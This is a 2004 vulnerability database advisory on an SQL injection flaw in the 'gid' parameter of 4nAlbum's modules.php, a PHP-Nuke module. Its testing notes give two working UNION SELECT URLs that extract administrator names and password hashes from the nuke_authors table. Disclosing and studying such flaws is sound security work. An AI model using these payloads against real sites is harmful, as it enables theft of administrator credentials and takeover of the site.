4nAlbum modules.php gid Variable SQL Injection

2004-03-15T09:32:34
ID OSVDB:4294
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-03-15T09:32:34

Description

Vulnerability Description

4nAlbum contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "gid" variable in the "modules.php" script is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

4nAlbum contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "gid" variable in the "modules.php" script is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*

http://[victim]/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*

References:

Vendor URL: http://www.warp-speed.de/ Security Tracker: 1009449 Secunia Advisory ID:11134 Related OSVDB ID: 4293 Related OSVDB ID: 4291 Related OSVDB ID: 4292 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0142.html ISS X-Force ID: 15498 Bugtraq ID: 9881